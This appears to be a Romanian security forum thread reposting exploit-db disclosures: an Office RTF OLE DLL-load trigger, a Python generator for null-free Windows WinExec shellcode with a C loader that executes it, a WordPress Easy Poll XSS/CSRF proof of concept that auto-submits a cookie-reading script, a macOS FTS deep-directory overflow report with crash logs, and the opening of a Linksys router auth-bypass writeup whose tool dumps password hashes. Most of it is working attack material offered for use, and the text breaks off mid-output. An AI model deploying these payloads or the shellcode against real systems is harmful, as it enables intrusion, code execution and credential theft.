734] 001b8b54 7675476e 06a39d34 001b8ba4 767c6753 ole32!NdrExtpProxySendReceive+0x49 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932] 001b8b60 767c6753 7a61ad54 001b8fb0 0700022b RPCRT4!NdrpProxySendReceive+0xe 001b8f78 766fc8e2 7660fa10 7661484a 001b8fb0 RPCRT4!NdrClientCall2+0x1a6 001b8f98 765f98ad 00000014 00000004 001b8fc8 ole32!ObjectStublessClient+0xa2 [d:\w7rtm\com\rpc\ndrole\i386\stblsclt.cxx @ 474] 001b8fa8 765e8d1f 06a39d34 00000000 001b94e4 ole32!ObjectStubless+0xf [d:\w7rtm\com\rpc\ndrole\i386\stubless.asm @ 154] 001b8fc8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737] 001b8fe8 765e8a53 76706494 001b9340 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630] 001b9024 765e8e0d 76706494 001b9340 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487] 001b904c 76603170 76706494 00000000 001b94e4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377] 001b908c 76602ef4 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b92ec 76603170 76706448 00000000 001b94e4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685] 001b932c 76603098 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917] 001b9b04 76609e25 001b9c20 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334] 001b9b64 76609d86 001b9c20 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343] 001b9b88 76609d3f 001b9c20 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157] 001b9bb8 7662154c 001b9c20 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110] 001b9c34 7661f2af ecabafc9 11d27f19 00008e97 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046] 001b9c98 7661f1d4 053d0820 00000000 605c63a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576] *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office14\mso.dll - 001b9cc0 5eb283bf 053d0820 605c63a8 02397a00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495] *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll - WARNING: Stack unwind information not available. Following frames may be wrong. 001b9d34 60a53973 053d0820 605c63a8 02397a00 mso!Ordinal2023+0x7c 001b9d80 60a53881 036dc800 053d0820 605c63a8 wwlib!DllGetLCID+0x46e24d It is also possible to trigger this DLL load without requiring a user click by using the following RTF document: {\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7becabafc9-7f19-11d2-978e-0000f8757e2a\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}} Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38968.zip Sursa: https://www.exploit-db.com/exploits/38968/.

#All Windows Null-Free WinExec Shellcode """ #Coded by B3mB4m #Concat : b3mb4m@tuta.io #Home : b3mb4m.blogspot.com #10.12.2015 Tested on : Windows XP/SP3 x86 Windows 7 Ultimate x64 Windows 8.1 Pro Build 9600 x64 Windows 10 Home x64 -This shellcode NOT using GetProcAddress function- -With this python script you can create ur own shellcode- -This script belongs to shellsploit project- -https://github.com/b3mb4m/Shellsploit- """ def WinExec( command, fill=None): from re import findall fill = "31c9b957696e45eb0431c9eb0031c" fill += "031db31d231ff31f6648b7b308b7f0" fill += "c8b7f1c8b47088b77208b3f807e0c3" fill += "375f289c703783c8b577801c28b7a2" fill += "001c789dd81f957696e45753b8b34a" fill += "f01c645390e75f68b7a2401c7668b2" fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd" if len(command) == 4: stack = "%s" % (command.encode('hex')) data = findall("..?", stack) fill += "68"+"".join(data) else: if len(command)%4 == 3: padd = "\x20" elif len(command)%4 == 2: padd = "\x20"*2 elif len(command)%4 == 1: padd = "\x20"*3 else: padd = "" command = command + padd fixmesempai = findall('....?', command) for x in fixmesempai[::-1]: first = str(x[::-1].encode("hex")) second = findall("..?", first)[::-1] fill += "68"+"".join(second) fill += "89e2415152ffd7e886ffffff8b34af0" fill += "1c645813e4578697475f2817e045072" fill += "6f6375e98b7a2401c7668b2c6f8b7a1c" fill += "01c78b7caffc01c731c951ffd7" from random import randint name = str(randint(99999,99999999))+".txt" with open(name, "w") as exploit: exploit.write("\\x"+"\\x".join(findall("..?", fill))) exploit.close() print "\n\nLength : %s" % len(findall("..?", fill)) print "File : %s\n" % name print "\n\\x"+"\\x".join(findall("..?", fill)) if __name__ == '__main__': from sys import argv if len(argv) < 2: print "\nUsage : python exploit.py 'command'\n" else: WinExec(argv[1]) """ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <windows.h> //gcc shell.c -o shell.exe int main(void){ char *shellcode = "SHELLCODE"; DWORD mypage; BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &mypage); if (!ret) { printf ("VirtualProtect Failed ..\n"); return EXIT_FAILURE;} printf("strlen(shellcode)=%d\n", strlen(shellcode)); ((void (void))shellcode)(); } """ Sursa: https://www.exploit-db.com/exploits/38959/.

Ma trimite incontinuu pe prima pagina. Poti, te rog, sa-i faci upload pe alt site? Mersi.

Ma trimite pe prima pagina. Oare a expirat link-ul?

tar -xvzf numeprogram.tar.gz sau tar -xvzf numeprogram.tar.gz -C /folder/ sa-l extragi undeva specific. Daca programelul tau e in extensia .bz2 foloseste tar -xvjf numeprogram.tar.bz2

http://www.mbsd.jp/Whitepaper/smtpi.pdf.

Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF Exploit Author : Ahn Sung Jun Date : 2015-12-09 Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/ Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip Version : 1.1.3 Tested On : kail linux Iceweasel =========================================== Vulnerable Code : wp_easy_poll.php if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){ global $wpdb; $pc = new poll_class; /* Line 859 */ $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']); $wpdb->insert( $wpdb->prefix.$pc->table, $insert ); $new_poll_id = $wpdb->insert_id; $p_anss = $_REQUEST['p_anss']; if(is_array($p_anss) and $new_poll_id){ foreach($p_anss as $key => $value){ if($value != ''){ $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1); $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 ); } } } =========================================== POC (XSS & CSRF) <html> <body onload="javascript:document.forms[0].submit()"> <form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post"> <input type="hidden" name="action" value="p_add" /> <input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" /> <input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/> <input type="submit" name="submit" value="Submit" class="button" /> </form> </html> =========================================== Secure Coding if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){ global $wpdb; $pc = new poll_class; /* Secure Coding */ $_REQUEST['p_ques'] = str_replace("script", "x-script", $_REQUEST['p_ques']); $_REQUEST['p_ques'] = str_replace("<", ">", $_REQUEST['p_ques']); $_REQUEST['p_ques']= str_replace(">" ,"<", $_REQUEST['p_ques']); $insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']); $wpdb->insert( $wpdb->prefix.$pc->table, $insert ); $new_poll_id = $wpdb->insert_id; $p_anss = $_REQUEST['p_anss']; if(is_array($p_anss) and $new_poll_id){ foreach($p_anss as $key => $value){ if($value != ''){ $insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1); $wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 ); } } } Sursa: https://www.exploit-db.com/exploits/38915/.

MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow Credit: Maksymilian Arciemowicz ( CXSECURITY ) Website: http://cxsecurity.com/ http://cert.cx/ Affected software: - MACOS's Commands such as: ls, find, rm - iPhone 4s and later, - Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes - Apple TV (4th generation) - probably more Apple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. PoC: Create an direcotry and perform the following actions: # for i in {1..1024}; do mkdir B && cd B; done ... cd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory If such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. # for i in {1..1024}; do cd .. ; done Then you can perform recursive 'ls' command. Let's run it ten times: # for i in {1..10}; do ls -laR > /dev/null; done ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory ls: B: No such file or directory Segmentation fault: 11 Segmentation fault: 11 Segmentation fault: 11 ls: B: No such file or directory ls: B: No such file or directory Segmentation fault: 11 ls: B: No such file or directory ls: B: No such file or directory crash randometly. Let's see valgrind and lldb LLDB: ... /B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ./B/B/B/B/B/B/B/B/..../B/B: Process 987 stopped * thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 libsystem_c.dylib`strlen: -> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi 0x7fff97ab6d3a <+26>: andq $0xf, %rcx 0x7fff97ab6d3e <+30>: orq $-0x1, %rax (lldb) x/x $rdi error: memory read failed for 0xfeb66c00 (lldb) register read General Purpose Registers: rax = 0x00000000ffffffff rbx = 0x00000000ffffffff rcx = 0x00000000feb66c08 rdx = 0x00000000feb66c08 rdi = 0x00000000feb66c00 rsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 rbp = 0x00007fff5fbfe710 rsp = 0x00007fff5fbfe710 ... rip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 ... (lldb) bt * thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) * frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 frame #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 frame #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 frame #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 frame #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 frame #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 frame #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 frame #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 frame #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 frame #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 === Time for Valgrind ============= B/B/B/B/B/../B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: total 0 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 drwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 ==1009== Invalid write of size 1 ==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100001DAD: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== by 0x104809C8D: ??? ==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd ==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100001B92: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== by 0x104809C8D: ??? ==1009== ./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: ==1009== Invalid read of size 1 ==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x1000024A7: ??? (in /bin/ls) ==1009== by 0x100001CFC: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd ==1009== ==1009== ==1009== Process terminating with default action of signal 11 (SIGSEGV) ==1009== Access not within mapped region at address 0x102D20318 ==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) ==1009== by 0x1000024A7: ??? (in /bin/ls) ==1009== by 0x100001CFC: ??? (in /bin/ls) ==1009== by 0x100001A6F: ??? (in /bin/ls) ==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) ==1009== by 0x1: ??? ==1009== by 0x104809C8A: ??? ==1009== If you believe this happened as a result of a stack ==1009== overflow in your program's main thread (unlikely but ==1009== possible), you can try to increase the size of the ==1009== main thread stack using the --main-stacksize= flag. ==1009== The main thread stack size used in this run was 8388608. ==1009== ==1009== HEAP SUMMARY: ==1009== in use at exit: 1,671,999 bytes in 6,025 blocks ==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated ==1009== ==1009== LEAK SUMMARY: ==1009== definitely lost: 519 bytes in 6 blocks ==1009== indirectly lost: 104 bytes in 6 blocks ==1009== possibly lost: 0 bytes in 0 blocks ==1009== still reachable: 1,645,151 bytes in 5,819 blocks ==1009== suppressed: 26,225 bytes in 194 blocks ==1009== Rerun with --leak-check=full to see details of leaked memory ==1009== ==1009== For counts of detected and suppressed errors, rerun with: -v ==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) Segmentation fault: 11 MacMini:SCANME cxsecurity$ It looks like a buffer overflow in memmove(). Code http://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c The same issue for 'find' which may be used in cron scripts like ./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print ./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print ./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days ./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; Let's see valgrind output. MacMini:SCANME cxsecurity$ valgrind find . -name "R" ==1055== Memcheck, a memory error detector ==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==1055== Command: find . -name R ==1055== find: ./.Trashes: Permission denied ==1055== Invalid write of size 2 ==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1000013FA: ??? (in /usr/bin/find) ==1055== by 0x1000052AD: ??? (in /usr/bin/find) ==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) ==1055== by 0x3: ??? ==1055== by 0x10480CC7F: ??? ==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd ==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) ==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) ==1055== by 0x1000013FA: ??? (in /usr/bin/find) ==1055== by 0x1000052AD: ??? (in /usr/bin/find) ==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) ==1055== by 0x3: ??? ==1055== by 0x10480CC7F: ??? ... Invalid memory write without crashing. BTW: Many vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc. ====== References =================================== https://cxsecurity.com/issue/WLB-2014040027 https://cxsecurity.com/cveshow/CVE-2014-4433/ https://cxsecurity.com/cveshow/CVE-2014-4434/ https://cxsecurity.com/issue/WLB-2013110059 https://cxsecurity.com/cveshow/CVE-2013-6799/ https://cxsecurity.com/issue/WLB-2010040284 https://cxsecurity.com/cveshow/CVE-2010-0105/ https://cxsecurity.com/issue/WLB-2005090063 ====== Thanks =================================== Kacper and Smash_ from DEVILTEAM for technical support. ====== Credit =================================== Maksymilian Arciemowicz from cxsecurity.com http://cxsecurity.com/ http://cert.cx/ http://cifrex.org/ Sursa: https://www.exploit-db.com/exploits/38917/.

Hello folks, welcome to the first of a four part blog mini-series on firmware and embedded devices. My name is Matt Bergin and i'll be guiding you through the series. We plan to release each part of the series on the Friday of each week in December. The release of the final part in our series is dependent on our responsible disclosure timeline holding for a finding, but we're pretty confident. We're going to start slowly and with something simple. Today's tale is about a little access point that tried and tried but just couldn't keep its mouth shut. If it has an IP it'll talk, and what it says you might not like. Though, we tried to make it stop (see the timeline in the advisory), it didn't seem to matter to the manufacturer. So here we are: an 0day to help start your holiday season. Sincerely, KoreLogic Onward and upward! You can purchase the vulnerable device and download the corresponding firmware here: Linksys Official Support - Linksys EA6100 AC1200 Dual-Band Smart Wi-Fi Wireless Router We'll start off by doing what every other blog on firmware reversing tells you to do: run binwalk. In this case, it will work without any changes and you'll end up with a sub-directory containing the files you're going to want. If you would rather work off of a live system, JTAG pins are on the board and the console can be found with your baudrate set to 115200. # ls bin etc JNAP libexec mnt proc sbin tmp var dev home lib linuxrc opt root sys usr www # cd www # ls bootloader_info.cgi incoming_log.txt security_log.txt cgi-bin jcgi speedtest_info.cgi dhcp_log.txt JNAP sysinfo.cgi ezwifi_cfg.cgi license.pdf ui get_counter_info.cgi outgoing_log.txt usbinfo.cgi getstinfo.cgi qos_info.cgi There are a many CGI files of interest, I will only talk about a few. # ls -la sysinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 sysinfo.cgi -> /www/ui/cgi/sysinfo.cgi # ls -la getstinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 sysinfo.cgi -> /www/ui/cgi/getstinfo.cgi # ls -la sysinfo.cgi lrwxrwxrwx 1 root root 23 Jul 21 2014 ezwifi_cfg.cgi -> /www/ui/cgi/ezwifi_cfg.cgi These files are accessible from an unauthenticated perspective and allow the pentester to perform a variety of actions. A pentesting team with one person who is simultaneously conducting attacks from an already established network location and a geographically separate person oriented near the access point who desires access to the affected network could then use attacks like this to their advantage. This approach will reduce the need for internet facing assets whose use may compromise the engagement while allowing for a higher degree of persistency and anonymity. These attacks are a good example of why enterprise-grade wireless security is so important. $ python kl-linksys-ea6100-auth-bypass.py --help Brought to you by Level at KoreLogic Usage: kl-linksys-ea6100-auth-bypass.py [options] Options: -h, --help show this help message and exit --host=HOST Target IP address --sysinfo Get target system information --getpwhash Get target wireless password hash --getclearpw Get 